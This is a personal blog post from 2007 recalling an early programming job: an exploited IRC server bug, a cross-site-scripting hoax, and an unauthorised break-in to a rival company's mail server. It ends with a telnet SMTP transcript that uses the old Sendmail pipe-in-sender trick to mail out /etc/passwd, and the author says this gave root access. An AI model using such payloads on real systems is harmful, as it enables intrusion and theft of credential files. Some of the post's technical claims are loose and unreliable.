Friday, March 09, 2007

Its a mail (blog) distributed on Feb-14

None of you convinced that pipes(yahoo) will be used for smoking. At least try to smoke the following blah..blah.

I was not thrilled about the 0DD intiative taken during last year for couple of reasons.

1) When our team couldn't participate due to the rules, we didn't bother about it.

2) I love bugs for a unforgettable reasons. (long history should be interesting for you).

My first task by my first employer was writing an IRC chat server. And we had deadline too, since we have to ship them to other biggest .COM company (3rd biggest .COM in India during 2000). Deadline came, we delivered the software on time with 100's of known issues and zero bugs (when we agree before customer finds it, we call them as known issue :)).

No body really exploited the issues what we development team knows about it, since chat was in earlier stage in Chennai, many people was not using, we hardly see 50 concurrent users. But as usual like any other software, chat server used to conk down often for unknown reasons. Later one of our developer started chatting with every other chatters as himself like an another chatter, later he identified that an Hungarian (born in Chennai), can control shutdown operation of the server using simple IRC protocol implementation bug. Whenever he thinks to shut-it-down, he does so. Since we were amateur programmers, we did not write enough log to know the actual chat transcript. None of us knows about sniffers. It took more than a month to identify the root cause of the first bug.

Meanwhile our CEO, himself was a good hacker, challenged us to know more about security, and we also lost the contract expected to our esteemed organization.

Since it was in beta stage, our customer changed to better IRC implementation. So we know the target which needs to be hacked (our customer server) to prove (CEO, .COM company) that we are much better than the current vendor.

---------------------------- Another thread begins -------------------------
Exactly during the same time, we came to know that RedHat was acquired by Microsoft, We confirmed from one of the page from Typical Microsoft home page information. I was using all the abusive language against Linus Torvalds who guided RedHat to do that. Google was helpless to find more information about the financial worth of the deal.

After couple of days, We came to know that the above link was not from Microsoft, it was the illusion created by X-Site scripting. We confirmed it by using Opera browser. I can't forget such graceful IE bug. Hats-off to William Gates . They are very innovative in creating bugs. Ask people who hacked Windows Vista using speech recognition control. You can just control a remote computer just by using analog phone. (No other digital system in this world can be hacked using just analog signals).

Because of their innovative bugs, they spot a place where they can sell advertisements space (Dr Watson Error Message and Blue screen). So bugs help them lot :). I was really motivated by the above bug, now we switched our context to .COM.
----------------------------Thread End----------------------------

We used to be 24*7*60 in our office, I spent all my time to secure my IRC server and whenever I felt tried, raised my war chest against .COM using a simple tool called telnet. Since we were working with IRC, it took no time to learn SMTP. We prepared a good documentation about all the services running in the .COM server, and the climax was .COM company was using Sendmail 5.xx.

Let me explain SMTP protocol to know, how We hacked it.

SMTP protocols are simple.

1. Make a network connection
2. Say Hello and the id used for outgoing mail 3. Say to target id, for which mail has to be send.
4. Type subject.
5. body of the message.
6. . (END)

Sendmail had a bug, unpatched Sendmail is vulnerable to execute UNIX commands. Using below approach we logged in as root user in the same box.

Every year, I just remember this lovable day and my valentine (COMPUTER). Life become so beautiful cause of bugs, Now just tell me, Does bugs are lovable?. Ask anyone who knows the meaning for "Hemiptera".

-------------------For SMTP Hacking-------------------

% telnet targetsmtpserver 25
Connected to targetsmtpserver
Escape character is '^]'.
220 targetsmtpserver Sendmail 5.55 ready at Mon, 12 Feb 00 23:51 mail from: "|/bin/mail < /etc/passwd"
250 "|/bin/mail < /etc/passwd"... Sender ok rcpt to: 550 william... User unknown data
354 Enter mail, end with "." on a line by itself .
250 Mail accepted
Connection closed by foreign host.

/etc/passwd - unix password file
Sendmail - Mail server.
0DD - zero defect delivery

Note : I dedicate this blog to "Prabhu, Kannan, Gokul, Sara, Murali" for this valentine day.

1 comment:

Anonymous said...

I always inspired by you, your opinion and way of thinking, again, thanks for this nice post.

- Norman